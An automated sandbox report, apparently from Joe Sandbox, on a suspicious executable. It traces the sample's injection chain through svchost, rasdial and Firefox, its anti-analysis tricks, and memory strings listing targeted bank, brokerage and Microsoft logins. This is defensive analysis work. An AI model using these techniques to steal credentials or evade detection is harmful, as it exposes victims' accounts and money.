Source: C:\Users\user\Desktop\rPO-20429124.exe

File created: C:\Users\user\AppData\Local\Temp\aut21DE.tmp

Jump to behavior

Source: rPO-20429124.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\rPO-20429124.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: rasdial.exe, 00000004.00000003.2349033679.0000000000B72000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4528159843.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000003.2348918283.0000000000B51000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4528159843.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4528159843.0000000000B72000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: rPO-20429124.exe	Virustotal: Detection: 33%
Source: rPO-20429124.exe	ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\rPO-20429124.exe "C:\Users\user\Desktop\rPO-20429124.exe"
Source: C:\Users\user\Desktop\rPO-20429124.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPO-20429124.exe"
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
Source: C:\Windows\SysWOW64\rasdial.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\rPO-20429124.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPO-20429124.exe"	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPO-20429124.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rasdial.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rasdial.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: rPO-20429124.exe

Static file information: File size 1187328 > 1048576

Source: rPO-20429124.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: rPO-20429124.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: rPO-20429124.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: rPO-20429124.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: rPO-20429124.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: rPO-20429124.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: rPO-20429124.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: rPO-20429124.exe, 00000000.00000003.2064548111.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, rPO-20429124.exe, 00000000.00000003.2065852917.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2172254163.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2172254163.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071576701.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2068873294.0000000003000000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4529458678.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4529458678.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000004.00000003.2172336594.0000000004789000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000003.2174636574.000000000493D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rasdial.pdb source: svchost.exe, 00000002.00000003.2140751258.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2172158666.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000003.00000002.4528531691.000000000125E000.00000004.00000020.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000003.00000003.2110998909.0000000001275000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rPO-20429124.exe, 00000000.00000003.2064548111.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, rPO-20429124.exe, 00000000.00000003.2065852917.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2172254163.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2172254163.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071576701.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2068873294.0000000003000000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000004.00000002.4529458678.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4529458678.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000004.00000003.2172336594.0000000004789000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000003.2174636574.000000000493D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000003.2140751258.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2172158666.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000003.00000002.4528531691.000000000125E000.00000004.00000020.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000003.00000003.2110998909.0000000001275000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: rasdial.exe, 00000004.00000002.4528159843.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4530749885.000000000511C000.00000004.10000000.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2458009274.000000001255C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: rasdial.exe, 00000004.00000002.4528159843.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4530749885.000000000511C000.00000004.10000000.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2458009274.000000001255C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ciwawa29wTdWR69xAi924.exe, 00000003.00000000.2093661884.00000000009EF000.00000002.00000001.01000000.00000004.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000000.2239526640.00000000009EF000.00000002.00000001.01000000.00000004.sdmp

Source: rPO-20429124.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: rPO-20429124.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: rPO-20429124.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: rPO-20429124.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: rPO-20429124.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00134B37 LoadLibraryA,GetProcAddress,

0_2_00134B37

Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00158945 push ecx; ret	0_2_00158958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040C8F7 push edi; retf	2_2_0040C8FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D12C push ecx; iretd	2_2_0040D12F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402184 push edx; ret	2_2_00402187
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418248 push cs; ret	2_2_00418256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418248 push es; iretd	2_2_00418303
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418258 push es; iretd	2_2_00418303
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404A5D pushad ; retf	2_2_00404A60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403230 push eax; ret	2_2_00403232
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041742E push ebp; ret	2_2_0041742F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041F573 push edx; ret	2_2_0041F61B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404D06 push edx; retf	2_2_00404D08
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040D63C push esi; ret	2_2_0040D648
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404ECE push ds; ret	2_2_00404F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411760 push esi; iretd	2_2_00411784
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00404F34 push ds; ret	2_2_00404F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00413F34 push ecx; retf 4E92h	2_2_0041403B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041179E push esi; iretd	2_2_00411784
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx	2_2_034309B6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04AF27FA pushad ; ret	4_2_04AF27F9
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04AF225F pushad ; ret	4_2_04AF27F9
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04AF283D push eax; iretd	4_2_04AF2858
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_04B209AD push ecx; mov dword ptr [esp], ecx	4_2_04B209B6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A441FB push ebp; ret	4_2_00A441FC
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A4C3DE push edx; ret	4_2_00A4C3E8
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A4C340 push edx; ret	4_2_00A4C3E8
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A3E52D push esi; iretd	4_2_00A3E551
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A3E56B push esi; iretd	4_2_00A3E551
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A45025 push es; iretd	4_2_00A450D0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A45015 push cs; ret	4_2_00A45023
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A45015 push es; iretd	4_2_00A450D0

Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_001348D7
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001B5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_001B5376

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_00153187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00153187

Source: C:\Users\user\Desktop\rPO-20429124.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPO-20429124.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\rPO-20429124.exe	API/Special instruction interceptor: Address: 38D3234
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\rasdial.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\rasdial.exe	Window / User API: threadDelayed 2953			Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Window / User API: threadDelayed 7019			Jump to behavior

Source: C:\Users\user\Desktop\rPO-20429124.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\rasdial.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\rasdial.exe TID: 4476	Thread sleep count: 2953 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe TID: 4476	Thread sleep time: -5906000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe TID: 4476	Thread sleep count: 7019 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe TID: 4476	Thread sleep time: -14038000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe TID: 4984	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe TID: 4984	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe TID: 4984	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe TID: 4984	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe TID: 4984	Thread sleep time: -39000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\rasdial.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rasdial.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0019445A
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019C6D1 FindFirstFileW,FindClose,	0_2_0019C6D1
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0019C75C
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0019EF95
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0019F0F2
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0019F3F3
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_001937EF
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00193B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00193B12
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0019BCBC
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A4C6F0 FindFirstFileW,FindNextFileW,FindClose,	4_2_00A4C6F0

Source: C:\Users\user\Desktop\rPO-20429124.exe

Code function: 0_2_001349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001349A0

Source: e2ZZ3BBL.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: e2ZZ3BBL.4.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: e2ZZ3BBL.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: e2ZZ3BBL.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: e2ZZ3BBL.4.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: e2ZZ3BBL.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: e2ZZ3BBL.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: e2ZZ3BBL.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: e2ZZ3BBL.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: e2ZZ3BBL.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: e2ZZ3BBL.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: e2ZZ3BBL.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: e2ZZ3BBL.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: e2ZZ3BBL.4.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: e2ZZ3BBL.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: rasdial.exe, 00000004.00000002.4528159843.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4528830335.0000000001239000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: e2ZZ3BBL.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: e2ZZ3BBL.4.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: firefox.exe, 00000007.00000002.2459266384.0000011D9244C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]]
Source: e2ZZ3BBL.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: e2ZZ3BBL.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: e2ZZ3BBL.4.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: e2ZZ3BBL.4.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: e2ZZ3BBL.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: e2ZZ3BBL.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: e2ZZ3BBL.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: e2ZZ3BBL.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: e2ZZ3BBL.4.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: e2ZZ3BBL.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: e2ZZ3BBL.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: e2ZZ3BBL.4.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: e2ZZ3BBL.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
